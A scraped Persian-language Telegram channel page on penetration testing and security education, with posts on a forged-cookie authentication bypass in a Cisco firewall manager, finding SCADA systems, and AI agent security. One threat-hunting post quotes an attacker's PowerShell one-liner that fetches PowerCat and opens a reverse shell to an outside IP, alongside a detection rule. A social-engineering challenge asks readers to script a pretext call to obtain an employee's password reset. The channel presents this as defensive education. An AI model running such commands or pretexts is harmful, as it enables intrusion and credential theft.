Try Hack Box
6.34K subscribers
720 photos
66 videos
132 files
724 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
بایپس احراز هویت از طریق Forged Session Cookie

(مرکز مدیریت فایروال امن سیسکو)

تحلیل:
- فقط وجود کوکی CGISESSID را بررسی می‌کند.
- اما بررسی نمی‌ کند که آیا شناسه سشن معتبر، فعال و مرتبط با یک کاربر احراز هویت شده است یا خیر.

تاثیر:
یک مهاجم می‌ تواند یک مقدار دلخواه یا پیش‌ فرض مانند csm_processes را ارائه دهد تا از هدایت به صفحه /ui/login جلوگیری کند و به منابع محافظت‌ شده دسترسی غیرمجاز پیدا کند.

پس اگر واقعاً از خواندن مطالب این‌چنینی لذت میبرید، لطفاً حمایت خود را نشان دهید 🔥

@TryHackBox
🔥23👍21
چهار گروه بدافزار، پلیس پاکستان را با استفاده از PlugX، ShadowPad، Remcos و Cobalt Strike مورد هدف قرار دادند.

محققان امنیت سایبری، جزئیاتی از فعالیت‌های جاسوسی سایبری مداوم علیه چندین سازمان پلیس پاکستان را فاش کردند. این فعالیت‌ها توسط گروه‌هایی از هکرها انجام شده است که احتمالاً با چین و هند مرتبط هستند، و این حملات از فوریه 2024 تا آوریل 2026 ادامه داشته است.

https://thehackernews.com/2026/07/hackers-weaponize-balochistan-police.html

@RadioZeroPod
@TryHackBoxStory
@TryHackBoxOfficial
@TryHackBox
6
در حال تشکیل یک تیم داوطلبانه کوچک برای توسعه یک پلتفرم در حوزه امنیت سایبری هستیم. پروژه در مرحله شروع قرار داره و می‌خوایم اعضای اصلی تیم رو از همین ابتدا کنار هم جمع کنیم تا مسیر رشد پروژه رو با هم بسازیم.

در حال حاضر، برای این نقش‌ ها به‌ صورت مشخص نیاز داریم:

- Front-end Development

- Back-end Development
- Database
- DevOps و Cloud

اگر در یکی از این حوزه‌ ها فعالیت میکنید یا میخواید روی یک پروژه واقعی تجربه بگیرید، خوشحال میشویم باهم صحبت کنیم.

چرا این همکاری می‌تونه ارزشمند باشه؟

تجربه عملی کار روی یک پروژه واقعی، از ایده تا انتشار

همکاری با یک تیم هدفمند در حوزه امنیت سایبری و توسعه نرم‌افزار

ثبت نقش شما در صفحه تیم پروژه (Contributor/Team Member)

گواهی همکاری پس از مشارکت مؤثر

امکان استفاده از پروژه در رزومه، LinkedIn و GitHub

اولویت برای همکاری‌ های بلندمدت در صورت رشد پروژه


این همکاری در حال حاضر داوطلبانه است. هدف ما در این مرحله، ساخت یک محصول حرفه‌ای و کسب تجربه و سابقه کاری واقعی برای همه اعضای تیمه.


🔴 جهت ارتباط با ما به پشتیبانی پیام دهید :

@ThbxSupport
👍6👎6
Hacking Scada TryHackBox.pdf
936.6 KB
هک سیستم ‌های SCADA : پیداکردن سیستم ‌های SCADA با استفاده از Censys

همانطور که می‌دانید، سیستم ‌های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار می‌گیرند. این سیستم ‌های صنعتی هستند که در برخی موارد، می‌توانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می ‌شوند. پیداکردن آن‌ ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
🔥259👍3👎1
📌 برگزاری جلسه ویس چت : 

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
👤 مهندس : مهتاب کسائی

📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖  لینک جلسه :


🎙 قسمت اول
⁉️ موضوعات ما :

◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .


🆔
@RadioZeroPod
🆔
@TryHackBox
7👎5🔥2👏1
Live stream started
Live stream finished (1 hour)
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شده‌ام.

🔖 طبق این
گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است

یک ابزار متن‌باز، مشابه Netcat، برای اجرای یک شل معکوس:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق می‌کند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می‌ کنند.

بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin"

AND

cmdline: "powercat"

فراموش نکنید که بلوک‌ های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.

@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
🔥191
ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.

ا▪️ :  AI agent ها فقط چت‌ بات نیستند.

آنها میتوانند استدلال کنند، برنامه‌ ریزی کنند، ابزارها را فراخوانی کنند، به داده‌ ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم‌ های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حمله‌ی جدید و یک kill chain جدید ایجاد می‌ کند.

درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن‌ های معمولی در نظر گرفته شوند.

آنها به دسترسی سخت‌گیرانه‌ی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه‌ مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند.

با گسترش استفاده‌ی سازمانها از agentic AI، فقط ایمن‌ سازی مدل کافی نخواهد بود.

باید خودِ agent، identity آن، tools آن، memory آن، داده‌هایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.


🔥 اولین کانال فارسی زبان در AI Security .

@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
5
سری چالش های SE : هک انسان 1/20

📌 چالش : "تماس IT پشتیبانی"

سناریو:

شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس می‌گیرید.

📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه).

📓 اطلاعات از پیش:

شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید.

می‌دونید شرکت هفته پیش یک آپدیت سیستمی داشته.

میترا معمولاً ساعت ۹ صبح سرکاره.

سوال:

> شما چه دیالوگ و استراتژی‌ ای برای این تماس استفاده می‌ کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار می‌برید رو تو کامنت بنویسید).



⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی

@TryHackBox
#مهندسی_اجتماعی
4👍1